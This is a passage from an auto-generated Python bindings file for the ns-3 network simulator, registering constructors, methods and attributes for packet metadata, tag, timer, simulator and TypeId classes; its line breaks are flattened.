param('uint32_t', 'maxSize')], is_const=True) return def register_Ns3PacketMetadataItem_methods(root_module, cls): ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item() [constructor] cls.add_constructor([]) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item(ns3::PacketMetadata::Item const & arg0) [copy constructor] cls.add_constructor([param('ns3::PacketMetadata::Item const &', 'arg0')]) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::current [variable] cls.add_instance_attribute('current', 'ns3::Buffer::Iterator', is_const=False) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentSize [variable] cls.add_instance_attribute('currentSize', 'uint32_t', is_const=False) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromEnd [variable] cls.add_instance_attribute('currentTrimedFromEnd', 'uint32_t', is_const=False) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromStart [variable] cls.add_instance_attribute('currentTrimedFromStart', 'uint32_t', is_const=False) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::isFragment [variable] cls.add_instance_attribute('isFragment', 'bool', is_const=False) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::tid [variable] cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False) return def register_Ns3PacketMetadataItemIterator_methods(root_module, cls): ## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata::ItemIterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::PacketMetadata::ItemIterator const &', 'arg0')]) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata const * metadata, ns3::Buffer buffer) [constructor] cls.add_constructor([param('ns3::PacketMetadata const *', 'metadata'), param('ns3::Buffer', 'buffer')]) ## packet-metadata.h (module 'network'): bool ns3::PacketMetadata::ItemIterator::HasNext() const [member function] cls.add_method('HasNext', 'bool', [], is_const=True) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item ns3::PacketMetadata::ItemIterator::Next() [member function] cls.add_method('Next', 'ns3::PacketMetadata::Item', []) return def register_Ns3PacketTagIterator_methods(root_module, cls): ## packet.h (module 'network'): ns3::PacketTagIterator::PacketTagIterator(ns3::PacketTagIterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::PacketTagIterator const &', 'arg0')]) ## packet.h (module 'network'): bool ns3::PacketTagIterator::HasNext() const [member function] cls.add_method('HasNext', 'bool', [], is_const=True) ## packet.h (module 'network'): ns3::PacketTagIterator::Item ns3::PacketTagIterator::Next() [member function] cls.add_method('Next', 'ns3::PacketTagIterator::Item', []) return def register_Ns3PacketTagIteratorItem_methods(root_module, cls): ## packet.h (module 'network'): ns3::PacketTagIterator::Item::Item(ns3::PacketTagIterator::Item const & arg0) [copy constructor] cls.add_constructor([param('ns3::PacketTagIterator::Item const &', 'arg0')]) ## packet.h (module 'network'): void ns3::PacketTagIterator::Item::GetTag(ns3::Tag & tag) const [member function] cls.add_method('GetTag', 'void', [param('ns3::Tag &', 'tag')], is_const=True) ## packet.h (module 'network'): ns3::TypeId ns3::PacketTagIterator::Item::GetTypeId() const [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True) return def register_Ns3PacketTagList_methods(root_module, cls): ## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList() [constructor] cls.add_constructor([]) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList(ns3::PacketTagList const & o) [copy constructor] cls.add_constructor([param('ns3::PacketTagList const &', 'o')]) ## packet-tag-list.h (module 'network'): void ns3::PacketTagList::Add(ns3::Tag const & tag) const [member function] cls.add_method('Add', 'void', [param('ns3::Tag const &', 'tag')], is_const=True) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData const * ns3::PacketTagList::Head() const [member function] cls.add_method('Head', 'ns3::PacketTagList::TagData const *', [], is_const=True) ## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Peek(ns3::Tag & tag) const [member function] cls.add_method('Peek', 'bool', [param('ns3::Tag &', 'tag')], is_const=True) ## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Remove(ns3::Tag & tag) [member function] cls.add_method('Remove', 'bool', [param('ns3::Tag &', 'tag')]) ## packet-tag-list.h (module 'network'): void ns3::PacketTagList::RemoveAll() [member function] cls.add_method('RemoveAll', 'void', []) ## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Replace(ns3::Tag & tag) [member function] cls.add_method('Replace', 'bool', [param('ns3::Tag &', 'tag')]) return def register_Ns3PacketTagListTagData_methods(root_module, cls): ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData() [constructor] cls.add_constructor([]) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData(ns3::PacketTagList::TagData const & arg0) [copy constructor] cls.add_constructor([param('ns3::PacketTagList::TagData const &', 'arg0')]) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::count [variable] cls.add_instance_attribute('count', 'uint32_t', is_const=False) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::data [variable] cls.add_instance_attribute('data', 'uint8_t [ 21 ]', is_const=False) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::next [variable] cls.add_instance_attribute('next', 'ns3::PacketTagList::TagData *', is_const=False) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::tid [variable] cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False) return def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3Simulator_methods(root_module, cls): ## simulator.h (module 'core'): ns3::Simulator::Simulator(ns3::Simulator const & arg0) [copy constructor] cls.add_constructor([param('ns3::Simulator const &', 'arg0')]) ## simulator.h (module 'core'): static void ns3::Simulator::Cancel(ns3::EventId const & id) [member function] cls.add_method('Cancel', 'void', [param('ns3::EventId const &', 'id')], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::Destroy() [member function] cls.add_method('Destroy', 'void', [], is_static=True) ## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetContext() [member function] cls.add_method('GetContext', 'uint32_t', [], is_static=True) ## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetDelayLeft(ns3::EventId const & id) [member function] cls.add_method('GetDelayLeft', 'ns3::Time', [param('ns3::EventId const &', 'id')], is_static=True) ## simulator.h (module 'core'): static ns3::Ptr<ns3::SimulatorImpl> ns3::Simulator::GetImplementation() [member function] cls.add_method('GetImplementation', 'ns3::Ptr< ns3::SimulatorImpl >', [], is_static=True) ## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetMaximumSimulationTime() [member function] cls.add_method('GetMaximumSimulationTime', 'ns3::Time', [], is_static=True) ## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetSystemId() [member function] cls.add_method('GetSystemId', 'uint32_t', [], is_static=True) ## simulator.h (module 'core'): static bool ns3::Simulator::IsExpired(ns3::EventId const & id) [member function] cls.add_method('IsExpired', 'bool', [param('ns3::EventId const &', 'id')], is_static=True) ## simulator.h (module 'core'): static bool ns3::Simulator::IsFinished() [member function] cls.add_method('IsFinished', 'bool', [], is_static=True) ## simulator.h (module 'core'): static ns3::Time ns3::Simulator::Now() [member function] cls.add_method('Now', 'ns3::Time', [], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::Remove(ns3::EventId const & id) [member function] cls.add_method('Remove', 'void', [param('ns3::EventId const &', 'id')], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::SetImplementation(ns3::Ptr<ns3::SimulatorImpl> impl) [member function] cls.add_method('SetImplementation', 'void', [param('ns3::Ptr< ns3::SimulatorImpl >', 'impl')], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::SetScheduler(ns3::ObjectFactory schedulerFactory) [member function] cls.add_method('SetScheduler', 'void', [param('ns3::ObjectFactory', 'schedulerFactory')], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::Stop() [member function] cls.add_method('Stop', 'void', [], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::Stop(ns3::Time const & delay) [member function] cls.add_method('Stop', 'void', [param('ns3::Time const &', 'delay')], is_static=True) return def register_Ns3SystemWallClockMs_methods(root_module, cls): ## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs::SystemWallClockMs(ns3::SystemWallClockMs const & arg0) [copy constructor] cls.add_constructor([param('ns3::SystemWallClockMs const &', 'arg0')]) ## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs::SystemWallClockMs() [constructor] cls.add_constructor([]) ## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::End() [member function] cls.add_method('End', 'int64_t', []) ## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedReal() const [member function] cls.add_method('GetElapsedReal', 'int64_t', [], is_const=True) ## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedSystem() const [member function] cls.add_method('GetElapsedSystem', 'int64_t', [], is_const=True) ## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedUser() const [member function] cls.add_method('GetElapsedUser', 'int64_t', [], is_const=True) ## system-wall-clock-ms.h (module 'core'): void ns3::SystemWallClockMs::Start() [member function] cls.add_method('Start', 'void', []) return def register_Ns3Tag_methods(root_module, cls): ## tag.h (module 'network'): ns3::Tag::Tag() [constructor] cls.add_constructor([]) ## tag.h (module 'network'): ns3::Tag::Tag(ns3::Tag const & arg0) [copy constructor] cls.add_constructor([param('ns3::Tag const &', 'arg0')]) ## tag.h (module 'network'): void ns3::Tag::Deserialize(ns3::TagBuffer i) [member function] cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_pure_virtual=True, is_virtual=True) ## tag.h (module 'network'): uint32_t ns3::Tag::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## tag.h (module 'network'): static ns3::TypeId ns3::Tag::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## tag.h (module 'network'): void ns3::Tag::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_pure_virtual=True, is_const=True, is_virtual=True) ## tag.h (module 'network'): void ns3::Tag::Serialize(ns3::TagBuffer i) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3TagBuffer_methods(root_module, cls): ## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(ns3::TagBuffer const & arg0) [copy constructor] cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')]) ## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(uint8_t * start, uint8_t * end) [constructor] cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::CopyFrom(ns3::TagBuffer o) [member function] cls.add_method('CopyFrom', 'void', [param('ns3::TagBuffer', 'o')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::Read(uint8_t * buffer, uint32_t size) [member function] cls.add_method('Read', 'void', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')]) ## tag-buffer.h (module 'network'): double ns3::TagBuffer::ReadDouble() [member function] cls.add_method('ReadDouble', 'double', []) ## tag-buffer.h (module 'network'): uint16_t ns3::TagBuffer::ReadU16() [member function] cls.add_method('ReadU16', 'uint16_t', []) ## tag-buffer.h (module 'network'): uint32_t ns3::TagBuffer::ReadU32() [member function] cls.add_method('ReadU32', 'uint32_t', []) ## tag-buffer.h (module 'network'): uint64_t ns3::TagBuffer::ReadU64() [member function] cls.add_method('ReadU64', 'uint64_t', []) ## tag-buffer.h (module 'network'): uint8_t ns3::TagBuffer::ReadU8() [member function] cls.add_method('ReadU8', 'uint8_t', []) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::TrimAtEnd(uint32_t trim) [member function] cls.add_method('TrimAtEnd', 'void', [param('uint32_t', 'trim')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::Write(uint8_t const * buffer, uint32_t size) [member function] cls.add_method('Write', 'void', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteDouble(double v) [member function] cls.add_method('WriteDouble', 'void', [param('double', 'v')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU16(uint16_t data) [member function] cls.add_method('WriteU16', 'void', [param('uint16_t', 'data')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU32(uint32_t data) [member function] cls.add_method('WriteU32', 'void', [param('uint32_t', 'data')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU64(uint64_t v) [member function] cls.add_method('WriteU64', 'void', [param('uint64_t', 'v')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU8(uint8_t v) [member function] cls.add_method('WriteU8', 'void', [param('uint8_t', 'v')]) return def register_Ns3TimeWithUnit_methods(root_module, cls): cls.add_output_stream_operator() ## nstime.h (module 'core'): ns3::TimeWithUnit::TimeWithUnit(ns3::TimeWithUnit const & arg0) [copy constructor] cls.add_constructor([param('ns3::TimeWithUnit const &', 'arg0')]) ## nstime.h (module 'core'): ns3::TimeWithUnit::TimeWithUnit(ns3::Time const time, ns3::Time::Unit const unit) [constructor] cls.add_constructor([param('ns3::Time const', 'time'), param('ns3::Time::Unit const', 'unit')]) return def register_Ns3Timer_methods(root_module, cls): ## timer.h (module 'core'): ns3::Timer::Timer(ns3::Timer const & arg0) [copy constructor] cls.add_constructor([param('ns3::Timer const &', 'arg0')]) ## timer.h (module 'core'): ns3::Timer::Timer() [constructor] cls.add_constructor([]) ## timer.h (module 'core'): ns3::Timer::Timer(ns3::Timer::DestroyPolicy destroyPolicy) [constructor] cls.add_constructor([param('ns3::Timer::DestroyPolicy', 'destroyPolicy')]) ## timer.h (module 'core'): void ns3::Timer::Cancel() [member function] cls.add_method('Cancel', 'void', []) ## timer.h (module 'core'): ns3::Time ns3::Timer::GetDelay() const [member function] cls.add_method('GetDelay', 'ns3::Time', [], is_const=True) ## timer.h (module 'core'): ns3::Time ns3::Timer::GetDelayLeft() const [member function] cls.add_method('GetDelayLeft', 'ns3::Time', [], is_const=True) ## timer.h (module 'core'): ns3::Timer::State ns3::Timer::GetState() const [member function] cls.add_method('GetState', 'ns3::Timer::State', [], is_const=True) ## timer.h (module 'core'): bool ns3::Timer::IsExpired() const [member function] cls.add_method('IsExpired', 'bool', [], is_const=True) ## timer.h (module 'core'): bool ns3::Timer::IsRunning() const [member function] cls.add_method('IsRunning', 'bool', [], is_const=True) ## timer.h (module 'core'): bool ns3::Timer::IsSuspended() const [member function] cls.add_method('IsSuspended', 'bool', [], is_const=True) ## timer.h (module 'core'): void ns3::Timer::Remove() [member function] cls.add_method('Remove', 'void', []) ## timer.h (module 'core'): void ns3::Timer::Resume() [member function] cls.add_method('Resume', 'void', []) ## timer.h (module 'core'): void ns3::Timer::Schedule() [member function] cls.add_method('Schedule', 'void', []) ## timer.h (module 'core'): void ns3::Timer::Schedule(ns3::Time delay) [member function] cls.add_method('Schedule', 'void', [param('ns3::Time', 'delay')]) ## timer.h (module 'core'): void ns3::Timer::SetDelay(ns3::Time const & delay) [member function] cls.add_method('SetDelay', 'void', [param('ns3::Time const &', 'delay')]) ## timer.h (module 'core'): void ns3::Timer::Suspend() [member function] cls.add_method('Suspend', 'void', []) return def register_Ns3TimerImpl_methods(root_module, cls): ## timer-impl.h (module 'core'): ns3::TimerImpl::TimerImpl() [constructor] cls.add_constructor([]) ## timer-impl.h (module 'core'): ns3::TimerImpl::TimerImpl(ns3::TimerImpl const & arg0) [copy constructor] cls.add_constructor([param('ns3::TimerImpl const &', 'arg0')]) ## timer-impl.h (module 'core'): void ns3::TimerImpl::Invoke() [member function] cls.add_method('Invoke', 'void', [], is_pure_virtual=True, is_virtual=True) ## timer-impl.h (module 'core'): ns3::EventId ns3::TimerImpl::Schedule(ns3::Time const & delay) [member function] cls.add_method('Schedule', 'ns3::EventId', [param('ns3::Time const &', 'delay')], is_pure_virtual=True, is_virtual=True) return def register_Ns3TypeId_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor] cls.add_constructor([param('char const *', 'name')]) ## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor] cls.add_constructor([param('ns3::TypeId const &', 'o')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddAttribute', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddAttribute', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function] cls.add_method('AddTraceSource', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')], deprecated=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor, std::string callback, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddTraceSource', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor'), param('std::string', 'callback'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function] cls.add_method('GetAttribute', 'ns3::TypeId::AttributeInformation', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function] cls.add_method('GetAttributeFullName', 'std::string', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function] cls.add_method('GetAttributeN', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function] cls.add_method('GetConstructor', 'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', [], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function] cls.add_method('GetGroupName', 'std::string', [], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetHash() const [member function] cls.add_method('GetHash', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function] cls.add_method('GetName', 'std::string', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function] cls.add_method('GetParent', 'ns3::TypeId', [], is_const=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function] cls.add_method('GetRegistered', 'ns3::TypeId', [param('uint32_t', 'i')], is_static=True) ## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function] cls.add_method('GetRegisteredN', 'uint32_t', [], is_static=True) ## type-id.h (module 'core'): std::size_t ns3::TypeId::GetSize() const [member function] cls.add_method('GetSize', 'std::size_t', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function] cls.add_method('GetTraceSource', 'ns3::TypeId::TraceSourceInformation', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function] cls.add_method('GetTraceSourceN', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function] cls.add_method('GetUid', 'uint16_t', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function] cls.add_method('HasConstructor', 'bool', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function] cls.add_method('HasParent', 'bool', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function] cls.add_method('HideFromDocumentation', 'ns3::TypeId', []) ## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function] cls.add_method('IsChildOf', 'bool', [param('ns3::TypeId', 'other')], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function] cls.add_method('LookupAttributeByName', 'bool', [param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)], is_const=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByHash(uint32_t hash) [member function] cls.add_method('LookupByHash', 'ns3::TypeId', [param('uint32_t', 'hash')], is_static=True) ## type-id.h (module 'core'): static bool ns3::TypeId::LookupByHashFailSafe(uint32_t hash, ns3::TypeId * tid) [member function] cls.add_method('LookupByHashFailSafe', 'bool', [param('uint32_t', 'hash'), param('ns3::TypeId *', 'tid')], is_static=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function] cls.add_method('LookupByName', 'ns3::TypeId', [param('std::string', 'name')], is_static=True) ## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function] cls.add_method('LookupTraceSourceByName', 'ns3::Ptr< ns3::TraceSourceAccessor const >', [param('std::string', 'name')], is_const=True) ## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name, ns3::TypeId::TraceSourceInformation * info) const [member function] cls.add_method('LookupTraceSourceByName', 'ns3::Ptr< ns3::TraceSourceAccessor const >', [param('std::string', 'name'), param('ns3::TypeId::TraceSourceInformation *', 'info')], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function] cls.add_method('MustHideFromDocumentation', 'bool', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function] cls.add_method('SetAttributeInitialValue', 'bool', [param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function] cls.add_method('SetGroupName', 'ns3::TypeId', [param('std::string', 'groupName')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function] cls.add_method('SetParent', 'ns3::TypeId', [param('ns3::TypeId', 'tid')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetSize(std::size_t size) [member function] cls.add_method('SetSize', 'ns3::TypeId', [param('std::size_t', 'size')]) ## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t uid) [member function] cls.add_method('SetUid', 'void', [param('uint16_t', 'uid')]) return def register_Ns3TypeIdAttributeInformation_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable] cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable] cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable] cls.add_instance_attribute('flags', 'uint32_t', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable] cls.add_instance_attribute('help', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable] cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable] cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::supportLevel [variable] cls.add_instance_attribute('supportLevel', 'ns3::TypeId::SupportLevel', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::supportMsg [variable] cls.add_instance_attribute('supportMsg', 'std::string', is_const=False) return def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')]) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable] cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::callback [variable] cls.add_instance_attribute('callback', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable] cls.add_instance_attribute('help', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::supportLevel [variable] cls.add_instance_attribute('supportLevel', 'ns3::TypeId::SupportLevel', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::supportMsg [variable] cls.add_instance_attribute('supportMsg', 'std::string', is_const=False) return def register_Ns3Empty_methods(root_module, cls): ## empty.h (module 'core'): ns3::empty::empty() [constructor] cls.add_constructor([]) ## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor] cls.add_constructor([param('ns3::empty const &', 'arg0')]) return def register_Ns3Int64x64_t_methods(root_module, cls): cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_unary_numeric_operator('-') cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) 